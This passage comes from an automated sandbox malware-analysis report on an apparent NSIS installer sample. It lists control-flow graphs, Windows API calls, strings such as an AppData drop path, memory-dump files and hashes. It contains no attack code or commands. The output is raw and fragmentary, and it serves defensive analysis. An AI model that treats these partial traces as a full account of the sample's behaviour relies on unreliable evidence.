                                                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
                                                                                                              • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
                                                                                                              • SetWindowTextW.USER32(?,00423728), ref: 004041E8
                                                                                                              • ShowWindow.USER32(?,0000000A), ref: 0040431C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                              • String ID: (7B
                                                                                                              • API String ID: 3282139019-3251261122
                                                                                                              • Opcode ID: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
                                                                                                              • Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
                                                                                                              • Opcode Fuzzy Hash: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
                                                                                                              • Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 366 403ad8-403af0 call 4067c2 369 403af2-403b02 call 40632f 366->369 370 403b04-403b3b call 4062b6 366->370 378 403b5e-403b87 call 403dae call 405dc5 369->378 374 403b53-403b59 lstrcatW 370->374 375 403b3d-403b4e call 4062b6 370->375 374->378 375->374 384 403c19-403c21 call 405dc5 378->384 385 403b8d-403b92 378->385 391 403c23-403c2a call 40640a 384->391 392 403c2f-403c54 LoadImageW 384->392 385->384 386 403b98-403bb2 call 4062b6 385->386 390 403bb7-403bc0 386->390 390->384 395 403bc2-403bc6 390->395 391->392 393 403cd5-403cdd call 40140b 392->393 394 403c56-403c86 RegisterClassW 392->394 408 403ce7-403cf2 call 403dae 393->408 409 403cdf-403ce2 393->409 397 403da4 394->397 398 403c8c-403cd0 SystemParametersInfoW CreateWindowExW 394->398 400 403bd8-403be4 lstrlenW 395->400 401 403bc8-403bd5 call 405cea 395->401 406 403da6-403dad 397->406 398->393 402 403be6-403bf4 lstrcmpiW 400->402 403 403c0c-403c14 call 405cbd call 4063e8 400->403 401->400 402->403 407 403bf6-403c00 GetFileAttributesW 402->407 403->384 412 403c02-403c04 407->412 413 403c06-403c07 call 405d09 407->413 419 403cf8-403d12 ShowWindow call 406752 408->419 420 403d7b-403d83 call 405523 408->420 409->406 412->403 412->413 413->403 427 403d14-403d19 call 406752 419->427 428 403d1e-403d30 GetClassInfoW 419->428 425 403d85-403d8b 420->425 426 403d9d-403d9f call 40140b 420->426 425->409 429 403d91-403d98 call 40140b 425->429 426->397 427->428 432 403d32-403d42 GetClassInfoW RegisterClassW 428->432 433 403d48-403d6b DialogBoxParamW call 40140b 428->433 429->409 432->433 436 403d70-403d79 call 403a28 433->436 436->406
                                                                                                              APIs
                                                                                                                • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                                • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                              • lstrcatW.KERNEL32(1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\,75573420,00435000,00000000), ref: 00403B59
                                                                                                              • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,00435800,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403BD9
                                                                                                              • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,00435800,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
                                                                                                              • GetFileAttributesW.KERNEL32(Call), ref: 00403BF7
                                                                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00435800), ref: 00403C40
                                                                                                                • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                              • RegisterClassW.USER32(004291E0), ref: 00403C7D
                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
                                                                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
                                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403D00
                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
                                                                                                              • RegisterClassW.USER32(004291E0), ref: 00403D42
                                                                                                              • DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                              • String ID: (7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                              • API String ID: 1975747703-1642274604
                                                                                                              • Opcode ID: faef508d5617ccaf29f7204e00c3b9242aa942859a9d4d687d906c1b184c1908
                                                                                                              • Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
                                                                                                              • Opcode Fuzzy Hash: faef508d5617ccaf29f7204e00c3b9242aa942859a9d4d687d906c1b184c1908
                                                                                                              • Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 440 402f30-402f7e GetTickCount GetModuleFileNameW call 405ede 443 402f80-402f85 440->443 444 402f8a-402fb8 call 4063e8 call 405d09 call 4063e8 GetFileSize 440->444 445 4031cf-4031d3 443->445 452 4030a8-4030b6 call 402e8e 444->452 453 402fbe-402fd5 444->453 459 403187-40318c 452->459 460 4030bc-4030bf 452->460 455 402fd7 453->455 456 402fd9-402fe6 call 403447 453->456 455->456 464 403143-40314b call 402e8e 456->464 465 402fec-402ff2 456->465 459->445 462 4030c1-4030d9 call 40345d call 403447 460->462 463 4030eb-403137 GlobalAlloc call 406923 call 405f0d CreateFileW 460->463 462->459 488 4030df-4030e5 462->488 490 403139-40313e 463->490 491 40314d-40317d call 40345d call 4031d6 463->491 464->459 469 403072-403076 465->469 470 402ff4-40300c call 405e99 465->470 473 403078-40307e call 402e8e 469->473 474 40307f-403085 469->474 470->474 487 40300e-403015 470->487 473->474 479 403087-403095 call 4068b5 474->479 480 403098-4030a2 474->480 479->480 480->452 480->453 487->474 492 403017-40301e 487->492 488->459 488->463 490->445 500 403182-403185 491->500 492->474 494 403020-403027 492->494 494->474 495 403029-403030 494->495 495->474 497 403032-403052 495->497 497->459 499 403058-40305c 497->499 501 403064-40306c 499->501 502 40305e-403062 499->502 500->459 503 40318e-40319f 500->503 501->474 504 40306e-403070 501->504 502->452 502->501 505 4031a1 503->505 506 4031a7-4031ac 503->506 504->474 505->506 507 4031ad-4031b3 506->507 507->507 508 4031b5-4031cd call 405e99 507->508 508->445
                                                                                                              APIs
                                                                                                              • GetTickCount.KERNEL32 ref: 00402F44
                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\xXUnP7uCBJ.exe,00000400), ref: 00402F60
                                                                                                                • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\xXUnP7uCBJ.exe,80000000,00000003), ref: 00405EE2
                                                                                                                • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\xXUnP7uCBJ.exe,C:\Users\user\Desktop\xXUnP7uCBJ.exe,80000000,00000003), ref: 00402FA9
                                                                                                              • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 004030F0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\xXUnP7uCBJ.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                              • API String ID: 2803837635-1439786539
                                                                                                              • Opcode ID: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
                                                                                                              • Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
                                                                                                              • Opcode Fuzzy Hash: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
                                                                                                              • Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 724 40640a-406415 725 406417-406426 724->725 726 406428-40643e 724->726 725->726 727 406444-406451 726->727 728 406656-40665c 726->728 727->728 729 406457-40645e 727->729 730 406662-40666d 728->730 731 406463-406470 728->731 729->728 733 406678-406679 730->733 734 40666f-406673 call 4063e8 730->734 731->730 732 406476-406482 731->732 735 406643 732->735 736 406488-4064c6 732->736 734->733 740 406651-406654 735->740 741 406645-40664f 735->741 738 4065e6-4065ea 736->738 739 4064cc-4064d7 736->739 744 4065ec-4065f2 738->744 745 40661d-406621 738->745 742 4064f0 739->742 743 4064d9-4064de 739->743 740->728 741->728 751 4064f7-4064fe 742->751 743->742 748 4064e0-4064e3 743->748 749 406602-40660e call 4063e8 744->749 750 4065f4-406600 call 40632f 744->750 746 406630-406641 lstrlenW 745->746 747 406623-40662b call 40640a 745->747 746->728 747->746 748->742 753 4064e5-4064e8 748->753 758 406613-406619 749->758 750->758 755 406500-406502 751->755 756 406503-406505 751->756 753->742 759 4064ea-4064ee 753->759 755->756 761 406540-406543 756->761 762 406507-40652e call 4062b6 756->762 758->746 764 40661b 758->764 759->751 765 406553-406556 761->765 766 406545-406551 GetSystemDirectoryW 761->766 772 406534-40653b call 40640a 762->772 773 4065ce-4065d1 762->773 768 4065de-4065e4 call 40667c 764->768 770 4065c1-4065c3 765->770 771 406558-406566 GetWindowsDirectoryW 765->771 769 4065c5-4065c9 766->769 768->746 769->768 775 4065cb 769->775 770->769 774 406568-406572 770->774 771->770 772->769 773->768 778 4065d3-4065d9 lstrcatW 773->778 780 406574-406577 774->780 781 40658c-4065a2 SHGetSpecialFolderLocation 774->781 775->773 778->768 780->781 783 406579-406580 780->783 784 4065a4-4065bb SHGetPathFromIDListW CoTaskMemFree 781->784 785 4065bd 781->785 786 406588-40658a 783->786 784->769 784->785 785->770 786->769 786->781
                                                                                                              APIs
                                                                                                              • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040654B
                                                                                                              • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
                                                                                                              • SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
                                                                                                              • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 004065A8
                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 004065B3
                                                                                                              • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
                                                                                                              • lstrlenW.KERNEL32(Call,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                              • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                              • API String ID: 717251189-1230650788
                                                                                                              • Opcode ID: 05bff3a2d83114fcd993f4ecc25878232afbb7d489ed6444c63e00c36f1e26dc
                                                                                                              • Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
                                                                                                              • Opcode Fuzzy Hash: 05bff3a2d83114fcd993f4ecc25878232afbb7d489ed6444c63e00c36f1e26dc
                                                                                                              • Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 851 40176f-401794 call 402c41 call 405d34 856 401796-40179c call 4063e8 851->856 857 40179e-4017b0 call 4063e8 call 405cbd lstrcatW 851->857 862 4017b5-4017b6 call 40667c 856->862 857->862 866 4017bb-4017bf 862->866 867 4017c1-4017cb call 40672b 866->867 868 4017f2-4017f5 866->868 876 4017dd-4017ef 867->876 877 4017cd-4017db CompareFileTime 867->877 870 4017f7-4017f8 call 405eb9 868->870 871 4017fd-401819 call 405ede 868->871 870->871 878 40181b-40181e 871->878 879 40188d-4018b6 call 405450 call 4031d6 871->879 876->868 877->876 880 401820-40185e call 4063e8 * 2 call 40640a call 4063e8 call 405a4e 878->880 881 40186f-401879 call 405450 878->881 893 4018b8-4018bc 879->893 894 4018be-4018ca SetFileTime 879->894 880->866 913 401864-401865 880->913 891 401882-401888 881->891 895 402ace 891->895 893->894 897 4018d0-4018db CloseHandle 893->897 894->897 901 402ad0-402ad4 895->901 898 4018e1-4018e4 897->898 899 402ac5-402ac8 897->899 902 4018e6-4018f7 call 40640a lstrcatW 898->902 903 4018f9-4018fc call 40640a 898->903 899->895 909 401901-4022fc call 405a4e 902->909 903->909 909->901 913->891 915 401867-401868 913->915 915->881
                                                                                                              APIs
                                                                                                              • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Iw\Antndelsens,?,?,00000031), ref: 004017B0
                                                                                                              • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Iw\Antndelsens,?,?,00000031), ref: 004017D5
                                                                                                                • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                                • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                              • String ID: C:\Users\user\AppData\Local\Iw\Antndelsens$C:\Users\user\AppData\Local\Temp\nswC272.tmp$C:\Users\user\AppData\Local\Temp\nswC272.tmp\System.dll$Call
                                                                                                              • API String ID: 1941528284-3446446435
                                                                                                              • Opcode ID: 45b834d85ef4e1e2ed7d2d31852b9ecb22d19d59077027c4906be829d01ae2f6
                                                                                                              • Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
                                                                                                              • Opcode Fuzzy Hash: 45b834d85ef4e1e2ed7d2d31852b9ecb22d19d59077027c4906be829d01ae2f6
                                                                                                              • Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 917 40264a-402663 call 402c1f 920 402ac5-402ac8 917->920 921 402669-402670 917->921 924 402ace-402ad4 920->924 922 402672 921->922 923 402675-402678 921->923 922->923 925 4027dc-4027e4 923->925 926 40267e-40268d call 406348 923->926 925->920 926->925 930 402693 926->930 931 402699-40269d 930->931 932 402732-402735 931->932 933 4026a3-4026be ReadFile 931->933 934 402737-40273a 932->934 935 40274d-40275d call 405f61 932->935 933->925 936 4026c4-4026c9 933->936 934->935 937 40273c-402747 call 405fbf 934->937 935->925 946 40275f 935->946 936->925 939 4026cf-4026dd 936->939 937->925 937->935 942 4026e3-4026f5 MultiByteToWideChar 939->942 943 402798-4027a4 call 40632f 939->943 942->946 947 4026f7-4026fa 942->947 943->924 949 402762-402765 946->949 950 4026fc-402707 947->950 949->943 951 402767-40276c 949->951 950->949 952 402709-40272e SetFilePointer MultiByteToWideChar 950->952 953 4027a9-4027ad 951->953 954 40276e-402773 951->954 952->950 955 402730 952->955 956 4027ca-4027d6 SetFilePointer 953->956 957 4027af-4027b3 953->957 954->953 958 402775-402788 954->958 955->946 956->925 959 4027b5-4027b9 957->959 960 4027bb-4027c8 957->960 958->925 961 40278a-402790 958->961 959->956 959->960 960->925 961->931 962 402796 961->962 962->925
                                                                                                              APIs
                                                                                                              • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                                                              • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                                                                • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FD5
                                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                              • String ID: 9
                                                                                                              • API String ID: 163830602-2366072709
                                                                                                              • Opcode ID: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
                                                                                                              • Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
                                                                                                              • Opcode Fuzzy Hash: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
                                                                                                              • Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 963 406752-406772 GetSystemDirectoryW 964 406774 963->964 965 406776-406778 963->965 964->965 966 406789-40678b 965->966 967 40677a-406783 965->967 969 40678c-4067bf wsprintfW LoadLibraryExW 966->969 967->966 968 406785-406787 967->968 968->969
                                                                                                              APIs
                                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                              • wsprintfW.USER32 ref: 004067A4
                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2210772601.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                              • String ID: %s%S.dll$UXTHEME$\
                                                                                                              • API String ID: 2200240437-1946221925
                                                                                                              • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                              • Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
                                                                                                              • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                              • Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 970 40591f-40596a CreateDirectoryW 971 405970-40597d GetLastError 970->971 972 40596c-40596e 970->972 973 405997-405999 971->973 974 40597f-405993 SetFileSecurityW 971->974 972->973 974->972 975 405995 GetLastError 974->975 975->973
                                                                                                              APIs
                                                                                                              • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
                                                                                                              • GetLastError.KERNEL32 ref: 00405976
                                                                                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
                                                                                                              • GetLastError.KERNEL32 ref: 00405995
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2209910807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2209853074.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209928142.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2209953204.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
